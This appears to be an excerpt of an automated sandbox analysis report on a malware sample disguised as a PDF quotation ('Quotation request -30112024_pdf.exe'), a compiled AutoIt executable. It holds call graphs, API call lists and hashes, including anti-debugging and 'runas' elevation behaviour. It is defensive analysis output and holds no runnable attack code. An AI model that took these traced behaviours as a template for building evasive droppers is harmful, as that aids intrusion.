87791->87829 87809 41d762 87792->87809 87795 41d88d 87830 41d8ba LeaveCriticalSection __unlock_fhandle 87795->87830 87797->87755 87798->87756 87800 41ae62 ___lock_fhandle 87799->87800 87801 41aebc 87800->87801 87802 4182cb __lock 46 API calls 87800->87802 87803 41aec1 EnterCriticalSection 87801->87803 87805 41aede ___lock_fhandle 87801->87805 87804 41ae8e 87802->87804 87803->87805 87806 41aeaa 87804->87806 87807 41ae97 InitializeCriticalSectionAndSpinCount 87804->87807 87805->87789 87808 41aeec ___lock_fhandle LeaveCriticalSection 87806->87808 87807->87806 87808->87801 87810 41aded __lseeki64_nolock 46 API calls 87809->87810 87811 41d772 87810->87811 87812 41d7c8 87811->87812 87813 41d7a6 87811->87813 87815 41aded __lseeki64_nolock 46 API calls 87811->87815 87814 41ad67 __free_osfhnd 47 API calls 87812->87814 87813->87812 87816 41aded __lseeki64_nolock 46 API calls 87813->87816 87817 41d7d0 87814->87817 87819 41d79d 87815->87819 87820 41d7b2 CloseHandle 87816->87820 87818 41d7f2 87817->87818 87821 417f9d __dosmaperr 46 API calls 87817->87821 87818->87795 87822 41aded __lseeki64_nolock 46 API calls 87819->87822 87820->87812 87823 41d7be GetLastError 87820->87823 87821->87818 87822->87813 87823->87812 87824->87781 87825->87787 87826->87782 87827->87788 87828->87787 87829->87795 87830->87787 87832 414c82 ___lock_fhandle 87831->87832 87833 414cc3 87832->87833 87834 414c96 __recalloc 87832->87834 87835 414cbb ___lock_fhandle 87832->87835 87836 415471 __lock_file 47 API calls 87833->87836 87858 417f77 46 API calls __getptd_noexit 87834->87858 87835->87513 87837 414ccb 87836->87837 87844 414aba 87837->87844 87840 414cb0 87859 417f25 10 API calls __wcsicoll 87840->87859 87845 414af2 87844->87845 87848 414ad8 __recalloc 87844->87848 87860 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87845->87860 87846 414ae2 87911 417f77 46 API calls __getptd_noexit 87846->87911 87848->87845 87848->87846 87857 414b2d 87848->87857 87851 414c38 __recalloc 87914 417f77 46 API calls 
__getptd_noexit 87851->87914 87852 414139 __flswbuf 46 API calls 87852->87857 87856 414ae7 87912 417f25 10 API calls __wcsicoll 87856->87912 87857->87845 87857->87851 87857->87852 87861 41dfcc 87857->87861 87891 41d8f3 87857->87891 87913 41e0c2 46 API calls 3 library calls 87857->87913 87858->87840 87859->87835 87860->87835 87862 41dfd8 ___lock_fhandle 87861->87862 87863 41dfe0 87862->87863 87864 41dffb 87862->87864 87866 417f8a __write_nolock 46 API calls 87863->87866 87865 41e007 87864->87865 87870 41e041 87864->87870 87867 417f8a __write_nolock 46 API calls 87865->87867 87868 41dfe5 87866->87868 87869 41e00c 87867->87869 87871 417f77 __wcsicoll 46 API calls 87868->87871 87872 417f77 __wcsicoll 46 API calls 87869->87872 87873 41e063 87870->87873 87874 41e04e 87870->87874 87883 41dfed ___lock_fhandle 87871->87883 87886 41e014 87872->87886 87875 41ae56 ___lock_fhandle 48 API calls 87873->87875 87876 417f8a __write_nolock 46 API calls 87874->87876 87877 41e069 87875->87877 87878 41e053 87876->87878 87879 41e077 87877->87879 87880 41e08b 87877->87880 87882 417f77 __wcsicoll 46 API calls 87878->87882 87884 41da15 __read_nolock 56 API calls 87879->87884 87885 417f77 __wcsicoll 46 API calls 87880->87885 87881 417f25 __wcsicoll 10 API calls 87881->87883 87882->87886 87883->87857 87887 41e083 87884->87887 87888 41e090 87885->87888 87886->87881 87890 41e0ba __read LeaveCriticalSection 87887->87890 87889 417f8a __write_nolock 46 API calls 87888->87889 87889->87887 87890->87883 87892 41d900 87891->87892 87896 41d915 87891->87896 87893 417f77 __wcsicoll 46 API calls 87892->87893 87894 41d905 87893->87894 87895 417f25 __wcsicoll 10 API calls 87894->87895 87902 41d910 87895->87902 87897 41d94a 87896->87897 87898 420603 __getbuf 46 API calls 87896->87898 87896->87902 87899 414139 __flswbuf 46 API calls 87897->87899 87898->87897 87900 41d95e 87899->87900 87901 41dfcc __read 59 API calls 87900->87901 87903 41d965 87901->87903 87902->87857 87903->87902 87904 414139 __flswbuf 46 API 
calls 87903->87904 87905 41d988 87904->87905 87905->87902 87906 414139 __flswbuf 46 API calls 87905->87906 87907 41d994 87906->87907 87907->87902 87908 414139 __flswbuf 46 API calls 87907->87908 87909 41d9a1 87908->87909 87910 414139 __flswbuf 46 API calls 87909->87910 87910->87902 87911->87856 87912->87845 87913->87857 87914->87856 87918 4148b3 GetSystemTimeAsFileTime __aulldiv 87915->87918 87917 442c6b 87917->87516 87918->87917 87919->87523 87920->87529 87921->87529 87923 4339d2 FindFirstFileW 87922->87923 87924 4339f5 87922->87924 87925 4339e3 87923->87925 87926 4339ea FindClose 87923->87926 87924->87422 87925->87422 87926->87924 88182 443d73 88146->88182 88150 46eac5 88149->88150 88151 46eaac 88149->88151 88212 45f72f 54 API calls 88150->88212 88152 46eab1 88151->88152 88153 46eabb 88151->88153 88196 4689aa 88152->88196 88204 46ea4a 88153->88204 88155 46eaca 88155->87147 88158 46eab6 88158->87147 88159 46eac0 88159->87147 88160->87124 88162 40da20 CloseHandle 88161->88162 88163 40de4e 88162->88163 88279 40f110 88163->88279 88166 4264fa 88168 40de84 88307 40e080 SetFilePointerEx SetFilePointerEx 88168->88307 88170 40de8b 88308 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88170->88308 88172 40de90 88172->87130 88172->87138 88173->87141 88174->87143 88175->87148 88176->87150 88178 40da37 88177->88178 88179 40da29 88177->88179 88178->88179 88180 40da3c CloseHandle 88178->88180 88179->87156 88180->87156 88181->87154 88187 40df90 88182->88187 88185 40df90 2 API calls 88186 443da5 88185->88186 88186->87135 88188 40dfa2 88187->88188 88189 425e30 88188->88189 88190 40e01b SetFilePointerEx 88188->88190 88193 40dff3 88188->88193 88195 40e050 SetFilePointerEx 88189->88195 88194 40e050 SetFilePointerEx 88190->88194 88193->88185 88194->88193 88195->88193 88213 40d370 88196->88213 88201 4689e3 88201->88158 88203 4689d5 88203->88158 88205 40d370 52 API calls 88204->88205 88206 46ea59 88205->88206 88207 44c228 54 API calls 88206->88207 88208 46ea67 88207->88208 88209 
Execution Graph: call-graph node and edge listing (node IDs, code addresses and API names); the interactive rendering is not preserved in this extraction. API calls named in the graph: MultiByteToWideChar, CreateFileW, SetFilePointerEx, ReadFile, CharUpperBuffW, GetVersionExW, GetCurrentProcess, GetSystemInfo, GetNativeSystemInfo, LoadLibraryA, GetProcAddress, FreeLibrary, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetStartupInfoW, HeapCreate, HeapAlloc, GetModuleHandleW, TlsAlloc, TlsSetValue, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, GetStdHandle, GetFileType, SetHandleCount, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameW, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, LeaveCriticalSection, VariantClear, SystemParametersInfoW, GetCurrentDirectoryW, GetSystemTimeAsFileTime, CreateThread, CloseHandle, Sleep. A final chain of nodes at 032623F8 -> 03260048 (GetPEB) -> 032624D8 -> 032622E8 -> 032622F1 (Sleep) lies outside the 00400000 image.
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 004096C1
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • _memmove.LIBCMT ref: 0040970C
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                    • _memmove.LIBCMT ref: 00409D96
                                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                                    • _memmove.LIBCMT ref: 004297E5
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                    • String ID:
                                                                    • API String ID: 2383988440-0
                                                                    • Opcode ID: f87744838e7cdf90bb43d588a11a01879f5527508e4be11534881a08926f1cb6
                                                                    • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                    • Opcode Fuzzy Hash: f87744838e7cdf90bb43d588a11a01879f5527508e4be11534881a08926f1cb6
                                                                    • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                      • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104,?), ref: 00401F4C
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                      • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                      • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                    • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                      • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                    • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                    • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                      • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                      • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                      • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                      • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                      • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                      • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                      • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                      • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                    • String ID: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                    • API String ID: 2495805114-1127259613
                                                                    • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                    • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                    • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                                                    • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

Control-flow Graph for 0040E500-0040E65D (legend: Executed / Not Executed; graph rendering not preserved in this extraction). Basic blocks 40e500-40e65d and 427616-4276df; calls in graph order: 40bc70, GetVersionExW, 402160, 40e660, 40e680, 40ef60, GetCurrentProcess, 40ef20, 40efd0, GetSystemInfo, 40ef90, GetNativeSystemInfo, FreeLibrary, FreeLibrary.
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                    • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                    • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                    • String ID: 0SH
                                                                    • API String ID: 3363477735-851180471
                                                                    • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                    • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                    • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                    • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                    • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: IsThemeActive$uxtheme.dll
                                                                    • API String ID: 2574300362-3542929980
                                                                    • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                    • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                    • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                    • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,00000000), ref: 004339C7
                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 004339D8
                                                                    • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                    • String ID:
                                                                    • API String ID: 48322524-0
                                                                    • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                    • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                    • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                    • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                    • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                    • TranslateMessage.USER32(?), ref: 00409556
                                                                    • DispatchMessageW.USER32(?), ref: 00409561
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Peek$DispatchSleepTranslate
                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                    • API String ID: 1762048999-758534266
                                                                    • Opcode ID: dddd67931d801353eb1dd189a0ac0c44ab293870bf309cdaaa327df0de120e66
                                                                    • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                    • Opcode Fuzzy Hash: dddd67931d801353eb1dd189a0ac0c44ab293870bf309cdaaa327df0de120e66
                                                                    • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                    • _fseek.LIBCMT ref: 00452B3B
                                                                    • __wsplitpath.LIBCMT ref: 00452B9B
                                                                    • _wcscpy.LIBCMT ref: 00452BB0
                                                                    • _wcscat.LIBCMT ref: 00452BC5
                                                                    • __wsplitpath.LIBCMT ref: 00452BEF
                                                                    • _wcscat.LIBCMT ref: 00452C07
                                                                    • _wcscat.LIBCMT ref: 00452C1C
                                                                    • __fread_nolock.LIBCMT ref: 00452C53
                                                                    • __fread_nolock.LIBCMT ref: 00452C64
                                                                    • __fread_nolock.LIBCMT ref: 00452C83
                                                                    • __fread_nolock.LIBCMT ref: 00452C94
                                                                    • __fread_nolock.LIBCMT ref: 00452CB5
                                                                    • __fread_nolock.LIBCMT ref: 00452CC6
                                                                    • __fread_nolock.LIBCMT ref: 00452CD7
                                                                    • __fread_nolock.LIBCMT ref: 00452CE8
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                      • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                      • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                    • __fread_nolock.LIBCMT ref: 00452D78
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                    • String ID:
                                                                    • API String ID: 2054058615-0
                                                                    • Opcode ID: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                    • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                    • Opcode Fuzzy Hash: 261ea3e649c629e7f6dbf375053436b3ded7ec84625d927aca874652b6838b5a
                                                                    • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                    • API String ID: 0-1896584978
                                                                    • Opcode ID: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                    • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                    • Opcode Fuzzy Hash: 975d6b83826f48e4bad7a9b73c0db4c874b4b9e4c1b74dfed07d80e27e7ad79c
                                                                    • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104,?), ref: 00401F4C
                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                    • __wcsicoll.LIBCMT ref: 00402007
                                                                    • __wcsicoll.LIBCMT ref: 0040201D
                                                                    • __wcsicoll.LIBCMT ref: 00402033
                                                                      • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                    • __wcsicoll.LIBCMT ref: 00402049
                                                                    • _wcscpy.LIBCMT ref: 0040207C
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,00000104), ref: 00428B5B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
